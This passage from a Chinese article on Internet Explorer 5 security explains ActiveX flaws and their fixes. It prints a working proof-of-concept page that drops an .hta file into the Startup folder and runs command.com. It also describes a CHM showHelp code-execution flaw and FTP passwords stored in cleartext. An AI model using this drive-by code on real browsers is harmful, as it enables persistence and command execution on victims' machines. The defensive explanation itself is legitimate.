二、ActiveX控件的漏洞。
第一个漏洞
使用微软控件可以格式化硬盘。由于这个漏洞的“杀伤力”太大,为了安全仅列出测试这个安全漏洞的代码,如下:
<object id="scr" classid="clsid:06290BD5-48AA-11D2
-8432-006008C3FBFC">
</object>
<SCRIPT>
scr.Reset();
scr.Pathf="C:\windows\Start Menu\Programs\启动\guninski.hta";
scr.Doc="<object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('你的IE有问题');wsh.Run('c:\command.com');</"+"SCRIPT>";
scr.write();
</SCRIPT>
</object>
看了这个代码,是否想知道这个代码为什么有如此厉害的威力?那我们就不妨来分析分析。首先,开头的<object>就表示它调用了Windows的ActiveX控件,其中那个“classid”是用来确定控件的。接下来的scr.Path=“C:\WINDOWS\Start Menu\Programs\启动\guninski.hta” 这一项就是指当你看到这网页,它就会写入guninski.hta(hta是IE所支持运行的采用HTML编程的一种文件)。接下来就可以写格式化硬盘的指令了,为安全起见,作者把这个代码换掉了,成了后面的警告弹出窗口。所有的这些动作都是在你所不知道的情况下进行的。当你浏览完含有这个代码的网页之后,再次启动电脑会看到依旧是正常的蓝天白云,然后你的硬盘狂转,接着就Game Over了。
解决办法
按照关闭JavaScript那样的方法关闭ActiveX控件的运行。
第二个漏洞
HHCtrl ActiveX控件的漏洞,远程入侵者(主要是通过网络共享,以及邮件等)如果能使.CHM(Windows的帮助文件)文件存放在本地,就可以执行任意代码。尽管微软已经发布了该漏洞的补丁,但不能解决所有的情形。入侵者可以创建一份有恶意的帮助文件并把它放在访问者可访问的地方,当你浏览网页的时候,它就会通过IE中的活动脚本showHelp打开,CHM帮助文件。听起来,大家可能会感觉很迷糊,其实简单地说就是通过IE的showHelp函数来调用它所恶意制造的冲突快捷键的帮助文件,通过帮助文件来调用任意的代码。为此微软发布了补丁程序,大家可以到http://microsoft.com/technet/security/bulletin/ms00-037.asp去看看。然而这个补丁程序并非真的管用,它只是限制了仅当帮助文件位于用户的本地机器时,才允许它执行快捷键。虽然给入侵者制造了一定的难度,但是通过E-Mail或者ActiveX控件还是很容易把文件放到指定的地方。
解决办法除了按照上面的关闭ActiveX控件之外,还可以在注册表之中删除
HKEY_CLASSES_ROOTCLSID{ADB880A6-D8FF-11CF-9377
-00AA003B7A11}Implemented
Categories {7DD95802-9882-11CF-9FA9-00AA006C42C4}
这样以后只要打开帮助文件就会弹出警告窗口。
最后,如果你使用的是NT系统,那么IE5的FTP密码会以文本方式存储在Windows中,默认目录为WinntProfiles[Username]Cookiesindex.dat。大家都知道IE自身携带的FTP工具可以使用ftp://用户名:密码@服务器,来快速访问FTP站点,尤其是在资源管理器里面使用起来更方便。但是这样你的FTP密码就会被保存到默认目录里面,结合前面我们所讲的那些远程读取文件的方法,或者通过本地用户查看目录文件就可以很容易得到FTP密码,危害自然也是显而易见的。
解决办法
最好不要在IE中使用FTP功能。
有了以上这些建议,想必你一定对IE5的安全有很多了解了吧?希望大家赶快行动起来,保护好自己的隐私和安全。
|
|